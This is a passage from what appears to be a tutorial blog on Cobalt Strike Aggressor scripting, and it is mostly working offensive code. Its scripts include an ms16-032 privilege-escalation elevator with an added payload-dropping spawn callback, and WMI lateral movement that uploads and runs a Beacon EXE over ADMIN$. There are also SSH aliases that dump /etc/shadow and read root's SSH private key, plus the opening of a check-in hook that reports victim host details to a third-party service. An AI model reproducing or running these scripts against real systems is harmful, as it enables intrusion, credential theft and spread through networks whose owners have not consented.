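# analyst. Assumes Sleep's base64_decode, strrep and str_decode built-ins
# (str_decode is assumed to be the inverse of the str_encode call used
# above); the sample value at the bottom is constructed.
sub decode_encoded_command {
	local('$b64 $bytes');
	# the alias wraps the value in escaped quotes; drop them if present
	$b64   = strrep($1, '"', '');
	# undo base64, then undo the UTF-16LE encoding the alias applied
	$bytes = base64_decode($b64);
	return str_decode($bytes, "UTF-16LE");
}

# constructed sample: the UTF-16LE, base64-encoded form of "Get-Date"
println(decode_encoded_command("RwBlAHQALQBEAGEAdABlAA=="));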
</code></pre></div><p>Below is the source of shell:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">alias</span> shell <span class="token punctuation">{</span>
	local<span class="token punctuation">(</span><span class="token string">'<span class="token variable">$args</span>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token variable">$args</span> <span class="token operator">=</span> substr<span class="token punctuation">(</span><span class="token variable">$0</span>, <span class="token number">6</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	btask<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;Tasked beacon to run: <span class="token variable">$args</span> (OPSEC)&quot;</span>, <span class="token string">&quot;T1059&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	bsetenv<span class="token operator">!</span><span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;_&quot;</span>, <span class="token variable">$args</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	beacon_execute_job<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;%COMSPEC%&quot;</span>, <span class="token string">&quot; /C %_%&quot;</span>, <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><h2 id="privilege-escalation-run-a-command">Privilege Escalation (Run a Command) <a href="#privilege-escalation-run-a-command" class="header-anchor">#</a></h2> <blockquote><p>Source of a privilege escalation script</p></blockquote> <p>The official ms16-032 run-a-command elevator. The callback receives <code>$1</code> = Beacon ID and <code>$2</code> = the command to run elevated; it reads the PowerShell module from disk, hosts it through Beacon with <code>beacon_host_script</code>, and runs the resulting one-liner with <code>bpowerpick!</code>:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token comment"># Integrate ms16-032</span>
<span class="token comment"># Sourced from Empire: https://github.com/EmpireProject/Empire/tree/master/data/module_source/privesc</span>
sub ms16_032_elevator <span class="token punctuation">{</span>
	local<span class="token punctuation">(</span><span class="token string">'<span class="token variable">$handle</span> <span class="token variable">$script</span> <span class="token variable">$oneliner</span>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># acknowledge this command</span>
	btask<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;Tasked Beacon to execute <span class="token variable">$2</span> via ms16-032&quot;</span>, <span class="token string">&quot;T1068&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># read in the script</span>
	<span class="token variable">$handle</span> <span class="token operator">=</span> openf<span class="token punctuation">(</span>getFileProper<span class="token punctuation">(</span>script_resource<span class="token punctuation">(</span><span class="token string">&quot;modules&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot;Invoke-MS16032.ps1&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
	<span class="token variable">$script</span> <span class="token operator">=</span> readb<span class="token punctuation">(</span><span class="token variable">$handle</span>, -1<span class="token punctuation">)</span><span class="token punctuation">;</span>
	closef<span class="token punctuation">(</span><span class="token variable">$handle</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># host the script in Beacon</span>
	<span class="token variable">$oneliner</span> <span class="token operator">=</span> beacon_host_script<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token variable">$script</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	
	<span class="token comment"># run the specified command via this exploit.</span>
	bpowerpick<span class="token operator">!</span><span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;Invoke-MS16032 -Command <span class="token entity" title="\&quot;">\&quot;</span> $+ <span class="token variable">$2</span> $+ <span class="token entity" title="\&quot;">\&quot;</span>&quot;</span>, <span class="token variable">$oneliner</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
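</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br></div></div><p>The page shows the elevator itself but not how it is wired into the client, nor what a spawn-a-session callback looks like. The following is an added example (not from the original page or from Cobalt Strike's own scripts): it registers <code>ms16_032_elevator</code> for <code>runasadmin</code>, then builds a spawn-a-session callback on top of it and registers that for <code>elevate</code>. The exploit name <code>demo-ms16-032</code>, the drop directory <code>C:\Users\Public</code>, the x86 payload and the <code>localhost</code> link target are choices made for this example.</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>
```sleep
# Added example, not from the original page or the official scripts.
# beacon_elevator_register: "runasadmin ms16-032 [command]" calls the callback
# with $1 = Beacon ID, $2 = command.
beacon_elevator_register("ms16-032", "Secondary Logon Handle Privilege Escalation (CVE-2016-0099)", &ms16_032_elevator);

# Spawn-a-session contract (beacon_exploit_register): $1 = Beacon ID, $2 = listener.
# This demo reuses the run-a-command elevator above: drop an EXE for the listener,
# launch it through ms16-032, then link to it if the listener is SMB/TCP.
sub ms16_032_spawn {
	local('$name $path $exe');

	# no point in running an exploit from an already elevated context
	if (-isadmin $1) {
		berror($1, "session is already elevated; use spawn instead");
		return;
	}

	btask($1, "Tasked Beacon to spawn " . listener_describe($2) . " via ms16-032", "T1068");

	# C:\Users\Public is writable by any local user, so the upload works before elevation
	$name = "svc" . rand(10000) . ".exe";
	$path = "C:\\Users\\Public\\" . $name;
	$exe  = artifact_payload($2, "exe", "x86");
	bupload_raw!($1, $path, $exe);

	# hand the dropped EXE to the run-a-command elevator defined above
	ms16_032_elevator($1, $path);

	# only acts for SMB/TCP listeners; HTTP/DNS payloads call home on their own
	beacon_link($1, "localhost", $2);
}

# "demo-ms16-032" is a made-up name for this example; it appears under "elevate"
beacon_exploit_register("demo-ms16-032", "Spawn a session via ms16-032 (example)", &ms16_032_spawn);
```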
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br></div></div><h2 id="privilege-escalation-spawn-a-session">Privilege Escalation (Spawn a Session) <a href="#privilege-escalation-spawn-a-session" class="header-anchor">#</a></h2> <blockquote><p>Official privilege escalation that spawns a new session</p></blockquote> <p>Source. Only the registration is shown here; a spawn-a-session callback registered with <code>beacon_exploit_register</code> receives <code>$1</code> = Beacon ID and <code>$2</code> = the listener for the new session, and is listed by the <code>elevate</code> command:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>beacon_exploit_register<span class="token punctuation">(</span><span class="token string">&quot;ms15-051&quot;</span>, <span class="token string">&quot;Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)&quot;</span>, <span class="token operator">&amp;</span>ms15_051_exploit<span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="lateral-movement-spawn-a-session">Lateral Movement (Spawn a Session) <a href="#lateral-movement-spawn-a-session" class="header-anchor">#</a></h2> <blockquote><p>Official lateral movement source</p></blockquote> <p>The same callback is registered twice, once per architecture; <code>lambda</code> binds <code>$arch</code> so that <code>wmi_remote_spawn</code> generates an EXE of the matching architecture:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>beacon_remote_exploit_register<span class="token punctuation">(</span><span class="token string">&quot;wmi&quot;</span>, <span class="token string">&quot;x86&quot;</span>, <span class="token string">&quot;Use WMI to run a Beacon payload&quot;</span>, lambda<span class="token punctuation">(</span><span class="token operator">&amp;</span>wmi_remote_spawn, <span class="token variable">$arch</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token string">&quot;x86&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
beacon_remote_exploit_register<span class="token punctuation">(</span><span class="token string">&quot;wmi64&quot;</span>, <span class="token string">&quot;x64&quot;</span>, <span class="token string">&quot;Use WMI to run a Beacon payload&quot;</span>, lambda<span class="token punctuation">(</span><span class="token operator">&amp;</span>wmi_remote_spawn, <span class="token variable">$arch</span> <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token string">&quot;x64&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token comment"># $1 = bid, $2 = target, $3 = listener</span>
sub wmi_remote_spawn <span class="token punctuation">{</span>
	local<span class="token punctuation">(</span><span class="token string">'<span class="token variable">$name</span> <span class="token variable">$exedata</span>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	btask<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;Tasked Beacon to jump to <span class="token variable">$2</span> (&quot;</span> <span class="token builtin class-name">.</span> listener_describe<span class="token punctuation">(</span><span class="token variable">$3</span><span class="token punctuation">)</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;) via WMI&quot;</span>, <span class="token string">&quot;T1047&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token comment"># we need a random file name.</span>
	<span class="token variable">$name</span> <span class="token operator">=</span> rand<span class="token punctuation">(</span>@<span class="token punctuation">(</span><span class="token string">&quot;malware&quot;</span>, <span class="token string">&quot;evil&quot;</span>, <span class="token string">&quot;detectme&quot;</span><span class="token punctuation">))</span> <span class="token builtin class-name">.</span> rand<span class="token punctuation">(</span><span class="token number">100</span><span class="token punctuation">)</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;.exe&quot;</span><span class="token punctuation">;</span>

	<span class="token comment"># generate an EXE. $arch defined via &amp;lambda when this function was registered with</span>
	<span class="token comment"># beacon_remote_exploit_register</span>
	<span class="token variable">$exedata</span> <span class="token operator">=</span> artifact_payload<span class="token punctuation">(</span><span class="token variable">$3</span>, <span class="token string">&quot;exe&quot;</span>, <span class="token variable">$arch</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token comment"># upload the EXE to our target (directly)</span>
	bupload_raw<span class="token operator">!</span><span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;<span class="token entity" title="\\">\\</span><span class="token entity" title="\\">\\</span> $+ <span class="token variable">$2</span> $+ <span class="token entity" title="\\">\\</span>ADMIN\$<span class="token entity" title="\\">\\</span> $+ <span class="token variable">$name</span>&quot;</span>, <span class="token variable">$exedata</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token comment"># execute this via WMI</span>
	brun<span class="token operator">!</span><span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;wmic /node:<span class="token entity" title="\&quot;">\&quot;</span> $+ <span class="token variable">$2</span> $+ <span class="token entity" title="\&quot;">\&quot;</span> process call create <span class="token entity" title="\&quot;">\&quot;</span><span class="token entity" title="\\">\\</span><span class="token entity" title="\\">\\</span> $+ <span class="token variable">$2</span> $+ <span class="token entity" title="\\">\\</span>ADMIN\$<span class="token entity" title="\\">\\</span> $+ <span class="token variable">$name</span> $+ <span class="token entity" title="\&quot;">\&quot;</span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

	<span class="token comment"># assume control of our payload (if it's an SMB or TCP Beacon)</span>
	beacon_link<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token variable">$2</span>, <span class="token variable">$3</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br></div></div><p>All of the functions and events used above are documented in the official Aggressor Script documentation.</p> <h1 id="ssh-sessions">SSH Sessions <a href="#ssh-sessions" class="header-anchor">#</a></h1> <blockquote><p>An SSH session is a Beacon-like session, but one that comes back from a Linux host.</p></blockquote> <p>How do we bring a Linux host in? The traditional way is the one the official documentation gives: connect to a Linux host on the internal network directly from a Beacon, with the following syntax (there is also <code>ssh-key &lt;IP&gt;:&lt;port&gt; &lt;username&gt; &lt;/path/to/key.pem&gt;</code> for key-based authentication):</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>beacon<span class="token operator">&gt;</span> <span class="token function">ssh</span> <span class="token operator">&lt;</span>IP<span class="token operator">&gt;</span>:<span class="token operator">&lt;</span>port<span class="token operator">&gt;</span> <span class="token operator">&lt;</span>username<span class="token operator">&gt;</span> <span class="token operator">&lt;</span>password<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>I started a Linux host locally and then pivoted to it from a Beacon:</p> <p><img src="/images/Aggressor-Script/image-20201215222850956.png" alt="image-20201215222850956"></p> <p>We now have a Linux host in the client. The benefit of bringing the Linux host in this way is probably mostly visual: it makes it easy to see which Windows host the Linux host was reached through. I won't comment on it further; personally I feel a direct SSH login would do just as well.</p> <p>Once logged in, we can run commands on the Linux host, much like in a Beacon:</p> <p><img src="/images/Aggressor-Script/image-20201215223153091.png" alt="image-20201215223153091"></p> <p>Besides the official method, Cross C2 can also be used. Download: https://github.com/gloxec/CrossC2/releases/tag/v2.1</p> <p>Documentation: https://gloxec.github.io/CrossC2/zh_cn/</p> <h2 id="会话类型的判断">Determining the Session Type <a href="#会话类型的判断" class="header-anchor">#</a></h2> <p>Once a host has checked in, the <strong>-isssh</strong> predicate tells us whether a session is an SSH (Linux) session. It takes one argument:</p> <p><code>$1</code>, the session ID; if the check passes, the code or function that follows runs.</p> <p>Let's check whether each of our sessions is Linux or Windows. Two Sleep details to watch in this kind of code: scalar variables are prefixed with <code>$</code> (<code>@</code> denotes an array), and Sleep's parser expects whitespace around operators, including the string concatenation operator <code>.</code>:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">command</span> what <span class="token punctuation">{</span>
	foreach <span class="token variable">$bid</span> <span class="token punctuation">(</span>beacon_ids<span class="token punctuation">(</span><span class="token punctuation">))</span> <span class="token punctuation">{</span>
		<span class="token keyword">if</span> <span class="token punctuation">(</span>-isssh <span class="token variable">$bid</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
			println<span class="token punctuation">(</span><span class="token variable">$bid</span> <span class="token builtin class-name">.</span> <span class="token string">&quot; is a Linux (SSH) session, host: &quot;</span> <span class="token builtin class-name">.</span> beacon_info<span class="token punctuation">(</span><span class="token variable">$bid</span>, <span class="token string">&quot;computer&quot;</span><span class="token punctuation">)</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;, user: &quot;</span> <span class="token builtin class-name">.</span> beacon_info<span class="token punctuation">(</span><span class="token variable">$bid</span>, <span class="token string">&quot;user&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
		<span class="token punctuation">}</span>
		<span class="token keyword">else</span> <span class="token punctuation">{</span>
			println<span class="token punctuation">(</span><span class="token variable">$bid</span> <span class="token builtin class-name">.</span> <span class="token string">&quot; is a Windows Beacon, host: &quot;</span> <span class="token builtin class-name">.</span> beacon_info<span class="token punctuation">(</span><span class="token variable">$bid</span>, <span class="token string">&quot;computer&quot;</span><span class="token punctuation">)</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;, user: &quot;</span> <span class="token builtin class-name">.</span> beacon_info<span class="token punctuation">(</span><span class="token variable">$bid</span>, <span class="token string">&quot;user&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
		<span class="token punctuation">}</span>
	<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p>Run it:</p> <p><img src="/images/Aggressor-Script/image-20201215230423505.png" alt="image-20201215230423505"></p> <p>It identified the session type and host information for each session.</p> <h2 id="ssh-aliases">SSH Aliases <a href="#ssh-aliases" class="header-anchor">#</a></h2> <blockquote><p>Just like Beacon aliases, we can create SSH console commands for Linux hosts, for example to dump <code>/etc/shadow</code>:</p></blockquote> <p>Below, <code>$1</code> is the session ID. The <code>-isadmin</code> check guards the command, since only root can read <code>/etc/shadow</code>:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>ssh_alias hashdump <span class="token punctuation">{</span>
	<span class="token keyword">if</span> <span class="token punctuation">(</span>-isadmin <span class="token variable">$1</span><span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token comment"># only root can read /etc/shadow</span>
		binput<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;dumping password hashes from /etc/shadow&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		bshell<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;cat /etc/shadow&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">}</span>
	<span class="token keyword">else</span> <span class="token punctuation">{</span>
		berror<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;not running as root, cannot read /etc/shadow&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201215231244460.png" alt="image-20201215231244460"></p> <p>You can of course run other commands. <code>bshell</code> is the function that executes a command in the SSH session, and it takes the following arguments:</p> <p><code>$1</code> the session ID</p> <p><code>$2</code> the command to run</p> <p>For example, reading the SSH private key on the Linux host:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>ssh_alias ssh_demo <span class="token punctuation">{</span>
	binput<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;reading root's SSH private key&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	bshell<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;cat /root/.ssh/id_rsa&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>Run:</p> <p><img src="/images/Aggressor-Script/image-20201215231926776.png" alt="image-20201215231926776"></p> <h2 id="ssh-command-register">ssh_command_register <a href="#ssh-command-register" class="header-anchor">#</a></h2> <p>After defining a custom SSH command, only its author knows how it is meant to be used. To make the command self-documenting for everyone on the team server, register its help text with <code>ssh_command_register</code>, which takes three arguments:</p> <p><code>$1</code> the command name</p> <p><code>$2</code> a short description of the command</p> <p><code>$3</code> the usage text, i.e. how to invoke it</p> <p>As an example, here is a command that searches for a file by name, starting from the root directory:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>ssh_alias <span class="token function">find</span> <span class="token punctuation">{</span>
	bshell<span class="token punctuation">(</span><span class="token variable">$1</span>,<span class="token string">&quot;find / -name <span class="token variable">$2</span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

ssh_command_register <span class="token punctuation">(</span>
	<span class="token string">&quot;find&quot;</span>,
	<span class="token string">&quot;查找你想要的文件从根目录开始&quot;</span>,
	<span class="token string">&quot;使用方式: find test.txt&quot;</span>
<span class="token punctuation">)</span><span class="token punctuation">;</span>
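</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p>The <code>find</code> alias above interpolates <code>$2</code> straight into the shell command and has no argument check, so <code>find</code> with no argument runs a broken command and a name containing shell metacharacters is interpreted by the remote shell. The following is an added example (not from the original page) of the same alias with those checks, plus the help registration: the alias name <code>sshfind</code>, the optional start directory and the <code>2&gt;/dev/null</code> redirect are choices made for this example.</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>
```sleep
# Added example, not from the original page: a shared SSH alias with the checks
# the find alias above lacks. Refuse to run without an argument, single-quote
# every argument so the remote shell keeps it literal, and register help text.

# $1 = session ID, $2 = file name (a glob is fine), $3 = optional start directory
ssh_alias sshfind {
	local('$pattern $dir');

	if (strlen($2) == 0) {
		berror($1, "usage: sshfind NAME [DIR]");
		return;
	}

	# wrap in single quotes; an embedded ' becomes '\'' so it survives as a literal
	$pattern = "'" . strrep($2, "'", "'\\''") . "'";
	$dir     = iff(strlen($3) == 0, "/", "'" . strrep($3, "'", "'\\''") . "'");

	binput($1, "sshfind " . $2 . " " . $dir);
	# 2>/dev/null drops the permission-denied noise find produces for unreadable paths
	bshell($1, "find " . $dir . " -name " . $pattern . " 2>/dev/null");
}

ssh_command_register(
	"sshfind",
	"Search for a file by name; the arguments are shell-quoted before use",
	"Usage: sshfind NAME [DIR]\n  e.g. sshfind 'id_rsa*' /home"
);
```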

</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201216121638204.png" alt="image-20201216121638204"></p> <p>Typing <code>?</code> in the SSH console lists the command with its description, and <code>help find</code> shows the command's usage text:</p> <p><img src="/images/Aggressor-Script/image-20201216121955524.png" alt="image-20201216121955524"></p> <p>Let's run it:</p> <p><img src="/images/Aggressor-Script/image-20201216122032723.png" alt="image-20201216122032723"></p> <h2 id="reacting-to-new-ssh-sessions">Reacting to new SSH Sessions <a href="#reacting-to-new-ssh-sessions" class="header-anchor">#</a></h2> <p>Just like <code>beacon_initial</code> for Beacons, the <code>ssh_initial</code> event fires when a new Linux host checks in, so that is where to put whatever should happen at that moment:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>on ssh_initial <span class="token punctuation">{</span>
	show_message<span class="token punctuation">(</span><span class="token string">&quot;New Linux host checked in<span class="token entity" title="\n">\n</span>IP: &quot;</span> <span class="token builtin class-name">.</span> beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;internal&quot;</span><span class="token punctuation">)</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;<span class="token entity" title="\n">\n</span>Host name: &quot;</span> <span class="token builtin class-name">.</span> beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;computer&quot;</span><span class="token punctuation">))</span><span class="token punctuation">;</span>

<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201216123313505.png" alt="image-20201216123313505"></p> <h2 id="popup-menus">Popup Menus <a href="#popup-menus" class="header-anchor">#</a></h2> <p>Right-click menu entries for Linux hosts use the <code>ssh</code> popup hook. <code>$1</code> is the array of selected session IDs, which is why it is captured as <code>@ids</code> and handed to <code>bshell</code>: one menu action can task every selected session at once.</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>popup <span class="token function">ssh</span> <span class="token punctuation">{</span>
	item <span class="token string">&quot;Run command&quot;</span> <span class="token punctuation">{</span>
		prompt_text<span class="token punctuation">(</span><span class="token string">&quot;Which command do you want to run?&quot;</span>, <span class="token string">&quot;w&quot;</span>, lambda<span class="token punctuation">(</span><span class="token punctuation">{</span>
			binput<span class="token punctuation">(</span>@ids, <span class="token string">&quot;shell <span class="token variable">$1</span>&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
			bshell<span class="token punctuation">(</span>@ids, <span class="token variable">$1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		<span class="token punctuation">}</span>, @ids <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token variable">$1</span><span class="token punctuation">))</span><span class="token punctuation">;</span>
	<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><img src="/images/Aggressor-Script/image-20201216124754601.png" alt="image-20201216124754601"></p> <p>Usage is essentially the same as for Beacon popups, so it is not repeated here.</p> <h1 id="server酱上线代码解析">Walkthrough of the Server酱 Check-in Notification Script <a href="#server酱上线代码解析" class="header-anchor">#</a></h1> <blockquote><p>Code source: 算命瞎子: http://www.nmd5.com/?p=567</p></blockquote> <p>Source code. Note what this script does operationally: for every new Beacon it sends the external and internal IP, user name and host name to a third-party push service over the Internet, and it builds the URL by string concatenation without URL-encoding those values.</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token comment"># runs once for every new Beacon that checks in</span>
on beacon_initial <span class="token punctuation">{</span>

    sub http_get <span class="token punctuation">{</span>
        local<span class="token punctuation">(</span><span class="token string">'<span class="token variable">$output</span> <span class="token variable">$url</span> <span class="token variable">$stream</span> <span class="token variable">$handle</span> @content <span class="token variable">$line</span>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># all local, so the caller's $url is not overwritten</span>
        <span class="token variable">$url</span> <span class="token operator">=</span> <span class="token punctuation">[</span>new java.net.URL: <span class="token variable">$1</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token variable">$stream</span> <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token variable">$url</span> openStream<span class="token punctuation">]</span><span class="token punctuation">;</span>
        <span class="token variable">$handle</span> <span class="token operator">=</span> <span class="token punctuation">[</span>SleepUtils getIOHandle: <span class="token variable">$stream</span>, <span class="token variable">$null</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

        @content <span class="token operator">=</span> readAll<span class="token punctuation">(</span><span class="token variable">$handle</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        foreach <span class="token variable">$line</span> <span class="token punctuation">(</span>@content<span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token variable">$output</span> .<span class="token operator">=</span> <span class="token variable">$line</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;<span class="token entity" title="\r">\r</span><span class="token entity" title="\n">\n</span>&quot;</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>

        println<span class="token punctuation">(</span><span class="token variable">$output</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token comment"># collect external/internal IP, user and computer name; spaces are replaced with _ so they survive in the URL</span>
    <span class="token variable">$externalIP</span> <span class="token operator">=</span> replace<span class="token punctuation">(</span>beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;external&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot; &quot;</span>, <span class="token string">&quot;_&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token variable">$internalIP</span> <span class="token operator">=</span> replace<span class="token punctuation">(</span>beacon_info<span class="token punctuation">(</span><span class="token variable">$1</span>, <span class="token string">&quot;internal&quot;</span><span class="token punctuation">)</span>, <span class="token string">&quot; &quot;</span>, <span class="token string">&quot;_&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
